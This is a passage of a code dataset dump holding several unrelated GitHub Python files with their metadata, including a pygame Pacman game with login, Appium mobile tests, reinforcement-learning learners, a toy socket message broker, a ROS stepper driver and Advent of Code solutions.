self.centro_y - self.abertura)\r\n labio_inferior = (self.centro_x + self.raio, self.centro_y + self.abertura)\r\n pontos = [canto_boca, labio_superior, labio_inferior]\r\n pygame.draw.polygon(tela, PRETO, pontos, 0)\r\n\r\n # Olho do Pacman\r\n olho_x = int(self.centro_x + self.raio / 3)\r\n olho_y = int(self.centro_y - self.raio * 0.70)\r\n olho_raio = int(self.raio / 10)\r\n pygame.draw.circle(tela, PRETO, (olho_x, olho_y), olho_raio, 0)\r\n\r\n def processar_eventos(self, eventos):\r\n for e in eventos:\r\n if e.type == pygame.KEYDOWN:\r\n if e.key == pygame.K_RIGHT:\r\n self.vel_x = VELOCIDADE\r\n elif e.key == pygame.K_LEFT:\r\n self.vel_x = -VELOCIDADE\r\n elif e.key == pygame.K_UP:\r\n self.vel_y = -VELOCIDADE\r\n elif e.key == pygame.K_DOWN:\r\n self.vel_y = VELOCIDADE\r\n elif e.type == pygame.KEYUP:\r\n if e.key == pygame.K_RIGHT:\r\n self.vel_x = 0\r\n elif e.key == pygame.K_LEFT:\r\n self.vel_x = 0\r\n elif e.key == pygame.K_UP:\r\n self.vel_y = 0\r\n elif e.key == pygame.K_DOWN:\r\n self.vel_y = 0\r\n\r\n def aceitar_movimento(self):\r\n self.linha = self.linha_intencao\r\n self.coluna = self.coluna_intencao\r\n\r\n def recusar_movimento(self, direcoes):\r\n self.linha_intencao = self.linha\r\n self.coluna_intencao = self.coluna\r\n\r\n def esquina(self, direcoes):\r\n pass\r\n\r\n\r\nclass Fantasma(ElementoJogo):\r\n def __init__(self, cor, tamanho):\r\n self.coluna = 13.0\r\n self.linha = 15.0\r\n self.linha_intencao = self.linha\r\n self.coluna_intencao = self.coluna\r\n self.velocidade = 1\r\n self.direcao = ABAIXO\r\n self.tamanho = tamanho\r\n self.cor = cor\r\n\r\n def pintar(self, tela):\r\n fatia = self.tamanho // 8\r\n px = int(self.coluna * self.tamanho)\r\n py = int(self.linha * self.tamanho)\r\n contorno = [(px, py + self.tamanho),\r\n (px + fatia, py + fatia * 2),\r\n (px + fatia * 2, py + fatia // 2),\r\n (px + fatia * 3, py),\r\n (px + fatia * 5, py),\r\n (px + fatia * 6, py + fatia // 2),\r\n (px + fatia * 7, py + fatia * 2),\r\n (px + self.tamanho, py + self.tamanho)]\r\n pygame.draw.polygon(tela, self.cor, contorno, 0)\r\n\r\n olho_raio_ext = fatia\r\n olho_raio_int = fatia // 2\r\n\r\n olho_e_x = int(px + fatia * 2.5)\r\n olho_e_y = int(py + fatia * 2.5)\r\n\r\n olho_d_x = int(px + fatia * 5.5)\r\n olho_d_y = int(py + fatia * 2.5)\r\n\r\n pygame.draw.circle(tela, BRANCO, (olho_e_x, olho_e_y), olho_raio_ext, 0)\r\n pygame.draw.circle(tela, PRETO, (olho_e_x, olho_e_y), olho_raio_int, 0)\r\n pygame.draw.circle(tela, BRANCO, (olho_d_x, olho_d_y), olho_raio_ext, 0)\r\n pygame.draw.circle(tela, PRETO, (olho_d_x, olho_d_y), olho_raio_int, 0)\r\n\r\n def calcular_regras(self):\r\n if self.direcao == ACIMA:\r\n self.linha_intencao -= self.velocidade\r\n elif self.direcao == ABAIXO:\r\n self.linha_intencao += self.velocidade\r\n elif self.direcao == ESQUERDA:\r\n self.coluna_intencao -= self.velocidade\r\n elif self.direcao == DIREITA:\r\n self.coluna_intencao += self.velocidade\r\n\r\n def mudar_direcao(self, direcoes):\r\n self.direcao = random.choice(direcoes)\r\n\r\n def esquina(self, direcoes):\r\n self.mudar_direcao(direcoes)\r\n\r\n def aceitar_movimento(self):\r\n self.linha = self.linha_intencao\r\n self.coluna = self.coluna_intencao\r\n\r\n def recusar_movimento(self, direcoes):\r\n self.linha_intencao = self.linha\r\n self.coluna_intencao = self.coluna\r\n self.mudar_direcao(direcoes)\r\n\r\n def processar_eventos(self, evts):\r\n pass\r\n\r\n\r\ndef digitandoLogin(coord_x, coord_y, listaRender, modo):\r\n stringDigitada = ''\r\n clock = pygame.time.Clock()\r\n listaRender.append([])\r\n if modo == \"senha\":\r\n modoAsterisco = True\r\n else:\r\n modoAsterisco = False\r\n while True:\r\n for evento in pygame.event.get():\r\n if evento.type == pygame.QUIT:\r\n pygame.quit()\r\n break\r\n elif evento.type == pygame.KEYDOWN:\r\n if evento.key == pygame.K_ESCAPE and modo == \"senha\":\r\n modoAsterisco = not modoAsterisco\r\n if evento.key == pygame.K_BACKSPACE:\r\n stringDigitada = stringDigitada[:-1]\r\n digUnicode = str(evento.unicode)\r\n if ' '<=digUnicode<='~' and digUnicode != \" \":\r\n stringDigitada += digUnicode\r\n\r\n if not modoAsterisco:\r\n Digitacao_img = font.render(stringDigitada, True, BRANCO)\r\n else:\r\n Digitacao_img = font.render(len(stringDigitada) * \"*\", True, BRANCO)\r\n listaRender[-1] = [Digitacao_img, (coord_x, coord_y)]\r\n if evento.key == pygame.K_RETURN:\r\n return stringDigitada\r\n\r\n screen.fill(PRETO)\r\n for elementoRender in listaRender:\r\n if elementoRender != []:\r\n screen.blit(elementoRender[0], elementoRender[1])\r\n \r\n pygame.display.flip()\r\n clock.tick(30)\r\n\r\ndef telaLogin():\r\n clock = pygame.time.Clock()\r\n coord_x = 20\r\n loginInicio_img = font.render(\"Voce ja possui login? Pressione Y/N\", True, BRANCO)\r\n listaRender = [[loginInicio_img, (coord_x, 20)]]\r\n done = False\r\n tipoLogin = 0\r\n digitandoCoords = -1\r\n loginEnter = 0\r\n flagLoginInicial = False\r\n listaLogin = []\r\n while not done:\r\n for evento in pygame.event.get():\r\n if evento.type == pygame.QUIT:\r\n done = True\r\n pygame.quit()\r\n break\r\n elif evento.type == pygame.KEYDOWN:\r\n if evento.key == pygame.K_y:\r\n flagLoginInicial = True\r\n tipoLogin = 1\r\n login_img = font.render(\"LOGIN:\", True, BRANCO)\r\n listaRender.append([login_img, (coord_x, 20)])\r\n digitandoCoords = [coord_x, 45, \"login\"]\r\n elif evento.key == pygame.K_n:\r\n flagLoginInicial = True\r\n tipoLogin = 2\r\n loginNovo_img = font.render(\"LOGIN NOVO:\", True, BRANCO)\r\n listaRender.append([loginNovo_img, (coord_x, 20)])\r\n digitandoCoords = [coord_x, 45, \"login\"]\r\n\r\n if loginEnter == 1:\r\n if tipoLogin == 1:\r\n login_img = font.render(\"SENHA: (ESC para exibir)\", True, BRANCO)\r\n listaRender.append([login_img, (coord_x, 90)])\r\n digitandoCoords = [coord_x, 115, \"senha\"]\r\n if tipoLogin == 2:\r\n login_img = font.render(\"SENHA NOVA: (ESC para exibir)\", True, BRANCO)\r\n listaRender.append([login_img, (coord_x, 90)])\r\n digitandoCoords = [coord_x, 115, \"senha\"]\r\n \r\n screen.fill(PRETO)\r\n if flagLoginInicial == True:\r\n listaRender.pop(0)\r\n flagLoginInicial = False\r\n\r\n for elementoRender in listaRender:\r\n screen.blit(elementoRender[0], elementoRender[1])\r\n\r\n if digitandoCoords != -1:\r\n listaLogin.append(digitandoLogin(digitandoCoords[0], digitandoCoords[1] ,listaRender, digitandoCoords[2]))\r\n if len(listaLogin) == 2:\r\n if tipoLogin == 1:\r\n ##VERIFICAR LOGIN E RETORNAR listaLogin[0]\r\n if login.check_user(listaLogin[0], listaLogin[1]):\r\n return listaLogin[0]\r\n else:\r\n return telaLogin()\r\n elif tipoLogin == 2:\r\n ##REGISTRAR LOGIN E RETORNAR listaLogin[0]\r\n if not login.check_username_duplicity(listaLogin[0]):\r\n login.save_user(listaLogin[0], listaLogin[1])\r\n return listaLogin[0]\r\n else:\r\n login_img = font.render(\"Nome de usuario ja em uso\", True, VERMELHO)\r\n screen.blit(login_img, (coord_x, 160))\r\n pygame.display.flip()\r\n time.sleep(3)\r\n return telaLogin()\r\n\r\n loginEnter = 1\r\n digitandoCoords = -1\r\n\r\n pygame.display.flip()\r\n clock.tick(30)\r\n \r\n\r\ndef gameLoop():\r\n blinky = Fantasma(VERMELHO, size)\r\n inky = Fantasma(CIANO, size)\r\n clyde = Fantasma(LARANJA, size)\r\n pinky = Fantasma(ROSA, size)\r\n \r\n cenario.moviveis.append(blinky)\r\n cenario.moviveis.append(inky)\r\n cenario.moviveis.append(clyde)\r\n cenario.moviveis.append(pinky)\r\n \r\n while True:\r\n\r\n pacman.calcular_regras()\r\n blinky.calcular_regras()\r\n inky.calcular_regras()\r\n clyde.calcular_regras()\r\n pinky.calcular_regras()\r\n cenario.calcular_regras()\r\n\r\n # Pintar a tela\r\n screen.fill(PRETO)\r\n cenario.pintar(screen)\r\n pacman.pintar(screen)\r\n blinky.pintar(screen)\r\n inky.pintar(screen)\r\n clyde.pintar(screen)\r\n pinky.pintar(screen)\r\n pygame.display.update()\r\n pygame.time.delay(100)\r\n\r\n # Captura os eventos\r\n eventos = pygame.event.get()\r\n pacman.processar_eventos(eventos)\r\n cenario.processar_eventos(eventos)\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n size = 600 // 30\r\n\r\n nomeUsuario = telaLogin()\r\n \r\n pacman = Pacman(size)\r\n cenario = Cenario(size, pacman)\r\n cenario.adicionar_movivel(pacman)\r\n\r\n gameLoop()\r\n","repo_name":"progmodular2022/Grupo2","sub_path":"src/pacman.pyw","file_name":"pacman.pyw","file_ext":"pyw","file_size_in_byte":25653,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20405630412","text":"def problem1():\r\n\twith open(\"Day10/input1.txt\") as f:\r\n\t lines = f.read().splitlines() \r\n\tlines = [x.strip(\"\") for x in lines]\r\n\r\n\tbrackets_dict = {\"(\": \")\", \")\": \"(\", \"{\": \"}\", \"}\": \"{\", \"[\": \"]\", \"]\": \"[\", \"<\": \">\", \">\": \"<\"}\r\n\tbrackets_score = {\")\": 3, \"]\": 57, \"}\": 1197, \">\": 25137}\r\n\topen_chars = \"({[<\"\r\n\tclose_chars = \")}]>\"\r\n\r\n\tscore = 0\r\n\r\n\tfor line in lines:\r\n\t\tstack = []\r\n\r\n\t\tfor char in line:\r\n\t\t\tif char in open_chars:\r\n\t\t\t\tstack.append(char)\r\n\t\t\telse:\r\n\t\t\t\tif stack.pop() != brackets_dict[char]:\r\n\t\t\t\t\tscore += brackets_score[char]\r\n\t\t\t\t\tbreak\r\n\r\n\treturn score\r\n\t\r\nprint(problem1())","repo_name":"antoine1242/AdventOfCode","sub_path":"2021/Day10/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16424516486","text":"# This sample code uses the Appium python client\r\n# pip install Appium-Python-Client\r\n# Then you can paste this into a file and simply run with Python\r\nimport time\r\n\r\nfrom appium import webdriver\r\nimport pytest\r\nfrom appium.webdriver.common.mobileby import MobileBy\r\nfrom appium.webdriver.common.touch_action import TouchAction\r\nfrom appium.webdriver.webdriver import WebDriver\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\n\r\n\r\nclass TestXueqiuAndroid(object):\r\n\r\n driver=WebDriver\r\n @classmethod\r\n def setup_class(cls):\r\n print(\"setup class\")\r\n #cls.driver=cls.init_appium()\r\n cls.driver=cls.restart_appium()\r\n cls.driver.find_element_by_xpath(\"//android.widget.RelativeLayout[3]/android.widget.ImageView\").click()\r\n\r\n def setup_method(self):\r\n print(\"setup method\")\r\n\r\n #TestXueqiuAndroid.driver=self.restart_appium()\r\n self.driver = TestXueqiuAndroid.driver\r\n self.driver.find_element_by_xpath(\"//android.widget.RelativeLayout[3]/android.widget.ImageView\").click()\r\n\r\n def test_login(self):\r\n\r\n el1 = TestXueqiuAndroid.driver.find_element_by_xpath(\"/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.view.ViewGroup/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.TabHost/android.widget.LinearLayout/android.widget.TabWidget/android.widget.RelativeLayout[4]/android.widget.ImageView\")\r\n el1.click()\r\n el2 = TestXueqiuAndroid.driver.find_element_by_id(\"com.xueqiu.android:id/tv_login_phone\")\r\n el2.click()\r\n\r\n def test_swipe(self):\r\n self.driver.find_element_by_id(\"com.xueqiu.android:id/action_message\")\r\n for i in range(5):\r\n self.driver.swipe(500,500,200,200)\r\n time.sleep(2)\r\n\r\n def test_action(self):\r\n self.driver.find_element_by_id(\"com.xueqiu.android:id/action_message\")\r\n action=TouchAction(self.driver)\r\n for i in range(5):\r\n action.press(x=500,y=500).move_to(x=200,y=200).release().perform()\r\n time.sleep(2)\r\n\r\n def test_action_p(self):\r\n rect=self.driver.get_window_rect()\r\n\r\n self.driver.find_element_by_id(\"com.xueqiu.android:id/action_message\")\r\n action=TouchAction(self.driver)\r\n for i in range(5):\r\n action.press(x=rect['width']*0.8,y=rect['height']*0.8).move_to(x=rect['width']*0.2,y=rect['height']*0.2).release().perform()\r\n time.sleep(2)\r\n\r\n def test_webview_simulator_native(self):\r\n self.driver.find_element_by_xpath(\"//*[@text='A股开户']\").click()\r\n self.driver.find_element_by_xpath(\"//*[@text='立即开户']\")\r\n WebDriverWait(self.driver,10).\\\r\n until(EC.presence_of_element_located((MobileBy.XPATH,\"//*[@text='立即开户']\")))\r\n\r\n def test_webview_simulator_css(self):\r\n print(self.driver.contexts)\r\n print(self.driver.current_context)\r\n self.driver.switch_to.context(self.driver.contexts[0])\r\n print(self.driver.current_context)\r\n\r\n def test_message(self):\r\n TestXueqiuAndroid.driver.find_element_by_id(\"com.xueqiu.android:id/action_message\").click()\r\n\r\n\r\n @classmethod\r\n def init_appium(cls) -> WebDriver:\r\n caps = {}\r\n caps[\"platformName\"] = \"android\"\r\n caps[\"deviceName\"] = \"test\"\r\n caps[\"appPackage\"] = \"com.xueqiu.android\"\r\n caps[\"appActivity\"] = \".view.WelcomeActivityAlias\"\r\n #caps[\"noReset\"] = True\r\n driver = webdriver.Remote(\"http://localhost:4723/wd/hub\", caps)\r\n driver.implicitly_wait(20)\r\n return driver\r\n\r\n\r\n\r\n\r\n def teardown_method(self):\r\n self.driver.back()\r\n\r\n @classmethod\r\n def restart_appium(cls)->WebDriver:\r\n caps = {}\r\n caps[\"platformName\"] = \"android\"\r\n caps[\"deviceName\"] = \"test\"\r\n caps[\"appPackage\"] = \"com.xueqiu.android\"\r\n caps[\"appActivity\"] = \".view.WelcomeActivityAlias\"\r\n caps[\"noReset\"]=True\r\n driver = webdriver.Remote(\"http://localhost:5723/wd/hub\", caps)\r\n driver.implicitly_wait(20)\r\n return driver","repo_name":"pandaman95/pythonProject","sub_path":"AppiumDemo/test_xueqiu_webview.py","file_name":"test_xueqiu_webview.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20302361474","text":"# python3\n\nimport sys\n\nclass Rope:\n\tdef __init__(self, s):\n\t\tself.s = s\n\tdef result(self):\n\t\treturn self.s\n\tdef process(self, i, j, k):\n\t\tcut_out = self.s[i:j+1]\n\t\tremain = self.s[0:i] + self.s[j+1:]\n\t\tself.s = remain[0:k] + cut_out + remain[k:]\n\nrope = Rope(sys.stdin.readline().strip())\nq = int(sys.stdin.readline())\nfor _ in range(q):\n\ti, j, k = map(int, sys.stdin.readline().strip().split())\n\trope.process(i, j, k)\nprint(rope.result())\n","repo_name":"zy15662UNUK/courseraUCSDDataStructure","sub_path":"week 5 & 6/Programming-Assignment-4/rope/rope.py","file_name":"rope.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43458295732","text":"from __future__ import division, generators, print_function\nimport numpy as np\nimport sys\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom macarico.annealing import EWMA, stochastic\nfrom macarico.util import Var, Varng\n\nimport macarico\nfrom macarico import StochasticPolicy\n\nclass Reinforce(macarico.Learner):\n \"REINFORCE with a scalar baseline function.\"\n\n def __init__(self, policy, baseline=EWMA(0.8)):\n macarico.Learner.__init__(self)\n assert isinstance(policy, StochasticPolicy)\n self.policy = policy\n self.baseline = baseline\n self.trajectory = []\n\n def get_objective(self, loss):\n if len(self.trajectory) == 0: return 0.\n\n b = 0 if self.baseline is None else self.baseline()\n total_loss = sum((torch.log(p_a) for p_a in self.trajectory)) * (loss - b)\n\n if self.baseline is not None:\n self.baseline.update(loss)\n\n self.trajectory = []\n return total_loss\n\n def forward(self, state):\n action, p_action = self.policy.stochastic(state)\n self.trajectory.append(p_action)\n return action\n\nclass LinearValueFn(nn.Module):\n def __init__(self, features, disconnect_values=True):\n nn.Module.__init__(self)\n self.features = features\n self.dim = features.dim\n self.disconnect_values = disconnect_values\n self.value_fn = nn.Linear(self.dim, 1)\n\n def forward(self, state):\n x = self.features(state)\n if self.disconnect_values:\n x = Varng(x.data)\n #x *= 0\n #x[0,0] = 1\n return self.value_fn(x)\n\n\nclass A2C(macarico.Learner):\n def __init__(self, policy, state_value_fn, value_multiplier=1.0):\n macarico.Learner.__init__(self)\n self.policy = policy\n self.state_value_fn = state_value_fn\n self.trajectory = []\n self.value_multiplier = value_multiplier\n self.loss_fn = nn.SmoothL1Loss()\n self.loss_var = torch.zeros(1)\n\n def get_objective(self, loss):\n if len(self.trajectory) == 0: return\n loss = float(loss)\n loss_var = Varng(self.loss_var + loss)\n \n total_loss = 0.0\n for p_a, value in self.trajectory:\n v = value.data[0,0]\n\n # reinforcement loss\n total_loss += (loss - v) * p_a.log()\n\n # value fn approximator loss\n total_loss += self.value_multiplier * self.loss_fn(value, loss_var)\n\n self.trajectory = []\n return total_loss\n\n def forward(self, state):\n action, p_action = self.policy.stochastic(state)\n value = self.state_value_fn(state)\n # log action probabilities and values taken along current trajectory\n self.trajectory.append((p_action, value))\n return action\n","repo_name":"hal3/macarico","sub_path":"macarico/lts/reinforce.py","file_name":"reinforce.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"3"} +{"seq_id":"41802638227","text":"#!/usr/bin/python\nimport wikipedia\nfrom gtts import gTTS\n\nsearchItem = raw_input('Enter query = ')\ninfo = wikipedia.summary(searchItem, sentences=2)\n\ntext_file = open(searchItem+'.txt', \"w\")\ntext_file.write(searchItem+\"\\n\")\ntext_file.write(info+\"\\n\")\ntext_file.close\n","repo_name":"mentix02/Athena","sub_path":"temp/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5879240521","text":"# import socket programming library\nfrom socket import *\nimport os\nimport json\nimport datetime\nimport sys\nfrom time import time, ctime, sleep\n\n# from queue import Queue\n# import thread module\nfrom _thread import *\nimport threading\nimport logging\n\nprint_lock = threading.Lock()\nnum = 1\n#log={}\n\n\n\n# diction={}\ndef doesFileExists(filePathAndName):\n return os.path.exists(filePathAndName)\n\n\n# thread function\ndef threaded(c,addr):\n while True:\n\n # data received from client\n data = c.recv(1024)\n if not data:\n print('Bye')\n\n # lock released on exit\n # print_lock.release()\n break\n\n # global diction\n message = []\n\n # Decoding the message\n msg = str(data.decode('ascii'))\n\n # Splitting into a list\n L = msg.split()\n\n # producer side\n if (L[0] == 'p'):\n\n #logging.warning(\"A WARNING\")\n #logging.basicConfig(filename='msg.log', filemode='w', format='%(asctime)s - %(message)s')\n #logging.info(\"role :producer\")\n #log={'role':'producer','topic':L[1]}\n curr_dir = os.getcwd()\n topic = os.path.join(curr_dir, 'topic.json')\n print(topic)\n\n if doesFileExists(topic):\n with open(topic) as json_file:\n files = json.load(json_file)\n json_file.close()\n if L[1] not in files:\n files[L[1]] = 0\n else:\n files[L[1]] = files[L[1]] + 1\n\n with open(topic, 'w') as json_file:\n json.dump(files, json_file)\n json_file.close()\n else:\n jfile = open(topic, \"w\")\n jfile.close()\n\n files = {}\n files[L[1]] = 0\n\n with open(topic, 'w') as json_file:\n json.dump(files, json_file)\n json_file.close()\n\n # currrnt time\n ct = datetime.datetime.now()\n\n # timestamp\n ts = ct.timestamp()\n\n # creating directory\n curr_dir = os.getcwd()\n final_dir = os.path.join(curr_dir, L[1])\n if not os.path.exists(final_dir):\n os.makedirs(final_dir)\n print(final_dir)\n\n # if L[1] not in diction:\n # diction[L[1]]=0\n\n message = ' '.join(map(str, L[2:]))\n #log.update({'message':message})\n # obj[str(ts)]=message\n\n filename = str(files[L[1]] // 5 + 1) + '.json'\n\n print(filename)\n final_dir = os.path.join(curr_dir, L[1] + '/' + filename)\n json_decoded = {}\n if doesFileExists(final_dir):\n with open(final_dir) as json_file:\n json_decoded = json.load(json_file)\n json_file.close()\n\n json_decoded[str(ts)] = message\n\n with open(final_dir, 'w') as json_file:\n json.dump(json_decoded, json_file)\n json_file.close()\n else:\n jfile = open(final_dir, \"w\")\n jfile.close()\n\n json_decoded = {}\n json_decoded[str(ts)] = message\n\n with open(final_dir, 'w') as json_file:\n json.dump(json_decoded, json_file)\n json_file.close()\n logging.basicConfig(level=logging.INFO, filename=\"py_log.log\", filemode=\"a\",\n format=\"%(asctime)s %(levelname)s %(message)s\")\n #logging.debug(\"A DEBUG Message\")\n logging.info(f\"\\nRole: Producer\\nTopic:{L[1]}\\nMessage:{message}\\nAddress:{addr}\\n\\n\")\n c.send(data)\n\n\n\n if (L[0] == 'c'):\n logging.basicConfig(level=logging.INFO, filename=\"py_log.log\", filemode=\"a\",\n format=\"%(asctime)s %(levelname)s %(message)s\")\n #logging.debug(\"A DEBUG Message\")\n logging.info(f\"\\nRole: Consumer\\nTopic:{L[1]}\\nAddress:{addr}\\n\\n\")\n if (L[-1] == \"e\"):\n try:\n\n out = \"\"\n j = 1\n filename = \"1.json\"\n curr_dir = os.getcwd()\n final_dir = os.path.join(curr_dir, L[1] + '/' + filename)\n json_decoded = {}\n message = []\n\n while doesFileExists(final_dir):\n with open(final_dir) as json_file:\n json_decoded = json.load(json_file)\n json_file.close()\n for i in json_decoded:\n message.append(json_decoded[i]+'\\n')\n j = j + 1\n filename = str(j) + '.json'\n final_dir = os.path.join(curr_dir, L[1] + '/' + filename)\n\n print(json_decoded)\n\n message = ' '.join(map(str, message))\n\n c.send(message.encode('ascii'))\n\n # f=open(L[1],\"r\")\n # print(L[1],f)\n # lines = f.readlines()\n # print(lines)\n # out=out+lines\n # print(out)\n # out= ' '.join(map(str, lines))\n # print(out)\n # f.close()\n\n except:\n out = \"No Topic\"\n c.send(out.encode('ascii'))\n\n try:\n filename = \"1.json\"\n curr_dir = os.getcwd()\n final_dir = os.path.join(curr_dir, L[1] + '/' + filename)\n j = 1\n message = []\n # print(L)\n json_decoded = {}\n while doesFileExists(final_dir):\n with open(final_dir) as json_file:\n json_decoded = json.load(json_file)\n json_file.close()\n for i in json_decoded:\n if (i > L[-1]):\n message.append(json_decoded[i]+'\\n')\n j = j + 1\n filename = str(j) + '.json'\n final_dir = os.path.join(curr_dir, L[1] + '/' + filename)\n\n if (len(message) == 0):\n message.append(\"No updates in the subscibed topic\")\n message = ' '.join(map(str, message))\n c.send(message.encode('ascii'))\n except:\n out = \"No Topic\"\n c.send(out.encode('ascii'))\n\n # c.send(data.encode('ascii'))\n\n # send back reversed string to client\n\n # connection closed\n c.close()\n\n\ndef heartbeat():\n serverName = '127.0.0.1'\n serverPort = 12345\n clientSocket = socket(AF_INET, SOCK_STREAM)\n clientSocket.connect((serverName, serverPort))\n message = 'first'\n modi = 'first'\n while (1):\n # clientSocket.sendto(message.encode(), (serverName, serverPort))\n # print(\"Modified\", modi)\n if (modi == 'Leader'):\n start_new_thread(server, ())\n message = \"Leader1\"\n clientSocket.send(message.encode('ascii'))\n modifiedMessage = clientSocket.recv(1024)\n # print(modifiedMessage.decode('ascii'))\n modi = str(modifiedMessage.decode('ascii'))\n sleep(10)\n clientSocket.close()\n\n\ndef server():\n host = \"\"\n\n # reserve a port on your computer\n # in our case it is 12345 but it\n # can be anything\n # print_lock.acquire()\n\n port = 12341\n s = socket(AF_INET, SOCK_STREAM)\n s.bind((host, port))\n print(\"socket binded to port\", port)\n\n # put the socket into listening mode\n s.listen(5)\n print(\"socket is listening\")\n\n # a forever loop until client wants to exit\n while True:\n # establish connection with client\n c, addr = s.accept()\n\n # lock acquired by client\n # print_lock.acquire()\n print('Connected to :', addr[0], ':', addr[1])\n\n # Start a new thread and return its identifier\n start_new_thread(threaded, (c,addr,))\n\n # start_new_thread(broker,())\n s.close()\n\n\ndef Main():\n start_new_thread(heartbeat, ())\n while True:\n print(\"Alive\")\n sleep(10)\n\n\nif __name__ == '__main__':\n # print(\"1\")\n Main()\n","repo_name":"AtulKrishnan/Yet-Another-Kafka","sub_path":"broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":8381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5653541286","text":"#!/usr/bin/env python3\nimport RPi.GPIO as GPIO\nimport rospy\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Int16MultiArray\nimport time\nfrom math import pi\nfrom math import copysign\n\nPINS_CONFIG = {\"STEP_L\": 18, \"DIR_L\": 4,\n \"STEP_R\": 20, \"DIR_R\": 16}\n\n\nclass motors ():\n def __init__(self, pins_config, init_speed=0):\n self.leftSub = rospy.Subscriber(\n \"/stepper_cmd\", Int16MultiArray, self.stepper_callback)\n #self.pi = pigpio_istance\n self.pins_config = pins_config\n self.init_pins()\n self.l_speed = init_speed\n self.r_speed = init_speed\n self.left_dir = bool(0)\n self.right_dir = bool(0)\n self.last_time_check_step_l = time.perf_counter()*1e6\n self.last_time_check_step_r = time.perf_counter()*1e6\n self.step_cur_state_l = bool(0)\n self.step_cur_state_r = bool(0)\n def init_pins(self):\n for key in self.pins_config:\n GPIO.setup(self.pins_config[key], GPIO.OUT)\n GPIO.output(self.pins_config[key], GPIO.LOW)\n\n def stepper_callback(self, msg):\n print(\"new data received\")\n received_d=msg.data\n right_d=bool(received_d[0])\n left_d=bool(received_d[1])\n self.r_speed=received_d[2]\n self.l_speed=received_d[3]\n if(self.right_dir != right_d):\n self.right_dir = right_d\n GPIO.output(self.pins_config[\"DIR_R\"], right_d)\n if(self.left_dir != left_d):\n self.left_dir = left_d\n GPIO.output(self.pins_config[\"DIR_L\"], left_d)\n\n def update_speed(self):\n \n #self.pi.get_current_tick()\n t_us_now = time.perf_counter()*1e6\n\n if (t_us_now- self.last_time_check_step_l >=self.l_speed) and (self.l_speed > 100):\n self.step_cur_state_l = not self.step_cur_state_l\n GPIO.output(self.pins_config[\"STEP_L\"], self.step_cur_state_l)\n self.last_time_check_step_l = t_us_now\n if (t_us_now- self.last_time_check_step_r >=self.r_speed) and (self.r_speed > 100):\n self.step_cur_state_r= not self.step_cur_state_r\n GPIO.output(self.pins_config[\"STEP_R\"], self.step_cur_state_r)\n self.last_time_check_step_r = t_us_now\n\n\nif __name__ == '__main__':\n try:\n rospy.init_node('motors_control', anonymous=True)\n GPIO.setmode(GPIO.BCM)\n rate = rospy.Rate(100000)\n steppers = motors(PINS_CONFIG, init_speed=0)\n# \n while not rospy.is_shutdown():\n steppers.update_speed()\n rate.sleep()\n GPIO.cleanup()\n except rospy.ROSInterruptException:\n GPIO.cleanup()\n","repo_name":"ahmedokasha000/aio_robot","sub_path":"src/stepper_driver_ros_jetson.py","file_name":"stepper_driver_ros_jetson.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72292257363","text":"import numpy as np #importing numpy and pandas libray\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split #importing train test split to train the data\nfrom sklearn import svm #importing supported vector machine\nimport pickle #importing pickle\ndf=pd.read_csv(\"breast_cancer.csv\") #firstly we load the file \nprint(df.head()) #then we check the first five data\ndf.drop(\"id\" , axis=1 , inplace = True ) #then we drop unneccassry coulmns\ndf.drop(\"Unnamed: 32\" , axis = 1 , inplace = True )#drop unneccassry coulmns\nprint(df.head()) #then we check our dataset again\ndf[\"diagnosis\"] = df[\"diagnosis\"] . map ({\"M\" : 1 , \"B\" : 0}) #Since machine lerning only understands numbers we give labels to M and B\nx=df.drop(\"diagnosis\" , axis =1 , inplace = False) #then we split the data into x and y to train the module by them\ny=df[\"diagnosis\"] #y is our target\nnp.random.seed(42) # we write random seed so we can get the same values from random values\nx_train , x_test , y_train , y_test = train_test_split(x,y,test_size=0.2) #then we train the module\nmodel=svm.SVC() #save the module in a variable model\nmodel.fit(x_train,y_train) #train the module with x_train and y_train data\nprint(model.score(x_train,y_train)) #then we find the score of the model\nprint(model.score(x_test,y_test))\npickle.dump(model,open(\"Breast_cancer_classifer_model.pkl\" , \"wb\")) # then we save this model in a file so it can be accessed \nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.heatmap(df.corr() , cbar= True)\nplt.show()\n\n","repo_name":"Cizzorz3/Breast_Cancer_Classification","sub_path":"Breast_Cancer_Model.py","file_name":"Breast_Cancer_Model.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30868067991","text":"\"\"\" day_03.py -- Advent of Code 2020 Day 3: Toboggan Trajectory\n\n Author: Chris Bowman\n Last Modified: 12/3/2020\n License: MIT\n\"\"\"\n\nimport math\n\n\ndef part_1(data: list, slope: tuple) -> int:\n trees = 0\n right, down = (0, 0)\n while down < len(data):\n if data[down][right % len(data[0])] == '#':\n trees += 1\n right += slope[0]\n down += slope[1]\n return trees\n\n\ndef part_2(data: list, slopes) -> int:\n return math.prod(part_1(data, slope) for slope in 